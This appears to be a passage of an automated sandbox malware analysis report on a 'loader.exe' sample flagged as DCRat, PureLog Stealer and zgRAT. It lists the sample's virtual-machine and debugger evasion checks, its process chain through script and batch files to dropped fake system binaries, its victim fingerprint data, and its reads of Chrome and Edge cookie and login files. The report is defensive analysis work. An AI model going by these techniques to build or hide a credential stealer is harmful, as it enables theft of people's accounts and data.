                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                                    Source: loader.exe, 00000000.00000003.2180344314.000000000311F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9R
                                    Source: OvRN5nW0jy.17.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                                    Source: OvRN5nW0jy.17.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                                    Source: OvRN5nW0jy.17.drBinary or memory string: discord.comVMware20,11696487552f
                                    Source: OvRN5nW0jy.17.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                                    Source: OvRN5nW0jy.17.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                                    Source: OvRN5nW0jy.17.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                                    Source: OvRN5nW0jy.17.drBinary or memory string: global block list test formVMware20,11696487552
                                    Source: OvRN5nW0jy.17.drBinary or memory string: tasks.office.comVMware20,11696487552o
                                    Source: loader.exe, 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Uhgfsd
                                    Source: loader.exe, 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
                                    Source: OvRN5nW0jy.17.drBinary or memory string: AMC password management pageVMware20,11696487552
                                    Source: w32tm.exe, 00000010.00000002.2402978545.00000259BE899000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3518599961.000000001D096000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: OvRN5nW0jy.17.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                                    Source: OvRN5nW0jy.17.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                                    Source: OvRN5nW0jy.17.drBinary or memory string: dev.azure.comVMware20,11696487552j
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                                    Source: OvRN5nW0jy.17.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                                    Source: wscript.exe, 00000002.00000003.2286112054.0000000003412000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\w
                                    Source: loader.exe, 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
                                    Source: OvRN5nW0jy.17.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                                    Source: OvRN5nW0jy.17.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                                    Source: loader.exe, loader.exe, 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                                    Source: chainPorthostCommon.exe, 00000005.00000002.2360055756.000000001DCC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`
                                    Source: OvRN5nW0jy.17.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                                    Source: OvRN5nW0jy.17.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                                    Source: loader.exe, loader.exe, 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                                    Source: loader.exe, 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                                    Source: OvRN5nW0jy.17.drBinary or memory string: outlook.office.comVMware20,11696487552s
                                    Source: loader.exe, 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                                    Source: OvRN5nW0jy.17.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                                    Source: OvRN5nW0jy.17.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                                    Source: loader.exe, loader.exe, 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Uhgfs
                                    Source: C:\Users\user\Desktop\loader.exeProcess information queried: ProcessInformationJump to behavior

                                    Anti Debugging

                                    barindex
                                    Hides threads from debuggers
                                    Source: C:\Users\user\Desktop\loader.exeThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeThread information set: HideFromDebuggerJump to behavior
                                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                                    Source: C:\Users\user\Desktop\loader.exeOpen window title or class name: ollydbg
                                    Source: C:\Users\user\Desktop\loader.exeFile opened: SIWDEBUG
                                    Source: C:\Users\user\Desktop\loader.exeFile opened: NTICE
                                    Source: C:\Users\user\Desktop\loader.exeFile opened: SICE
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00657DEE mov eax, dword ptr fs:[00000030h]0_2_00657DEE
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_04FF606C mov eax, dword ptr fs:[00000030h]0_2_04FF606C
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_04FF6391 mov eax, dword ptr fs:[00000030h]0_2_04FF6391
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0064B7E0 __EH_prolog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItemTextW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,_swprintf,_swprintf,_swprintf,ShellExecuteExW,_swprintf,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongW,SetWindowLongW,SetDlgItemTextW,_wcslen,_swprintf,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetWindowTextW,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,0_2_0064B7E0
                                    Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ServerWinRuntimeBroker\wJc3A8cK4hSMmtCgCMOA49.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe "C:\ServerWinRuntimeBroker/chainPorthostCommon.exe"Jump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline"Jump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.cmdline"Jump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HArqwkOZhw.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF2D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E4D641D33A148FC98C6B9EA6A6669B1.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC121.tmp" "c:\Windows\System32\CSCE59377155588453BA4975E271891CFF.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\LiveKernelReports\RuntimeBroker.exe "C:\Windows\LiveKernelReports\RuntimeBroker.exe" Jump to behavior
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.00000000038B3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.0000000003970000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .1",5,1,"","user","134349","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\LiveKernelReports","D8ER27LA (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United Stat
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"44","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.1",5,1,"","user","134349","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\LiveKernelReports","D8ER27LA (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                                    Source: RuntimeBroker.exe, 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0064F654 cpuid 0_2_0064F654
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeQueries volume information: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe VolumeInformationJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeQueries volume information: C:\Windows\LiveKernelReports\RuntimeBroker.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeQueries volume information: C:\Windows\DiagTrack\Scenarios\dasHost.exe VolumeInformation
                                    Source: C:\Recovery\conhost.exeQueries volume information: C:\Recovery\conhost.exe VolumeInformation
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeQueries volume information: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe VolumeInformation
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeQueries volume information: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe VolumeInformation
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeQueries volume information: C:\Windows\DiagTrack\Scenarios\dasHost.exe VolumeInformation
                                    Source: C:\Recovery\conhost.exeQueries volume information: C:\Recovery\conhost.exe VolumeInformation
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeQueries volume information: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe VolumeInformation
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000011.00000002.3435800974.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.2357344463.0000000012B88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: chainPorthostCommon.exe PID: 2308, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 6008, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: dasHost.exe PID: 3404, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: loader.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.loader.exe.5d2d70d.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.loader.exe.74d170d.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.chainPorthostCommon.exe.4b0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.loader.exe.5d2d70d.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.loader.exe.74d170d.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.2162490833.0000000005BE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2161189771.0000000007387000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000000.2286038382.00000000004B2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Microsoft\csrss.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\conhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: loader.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.loader.exe.5d2d70d.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.loader.exe.74d170d.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.chainPorthostCommon.exe.4b0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.loader.exe.5d2d70d.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.loader.exe.74d170d.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Microsoft\csrss.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\conhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, type: DROPPED
                                    Tries to harvest and steal browser information (history, passwords, etc)
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
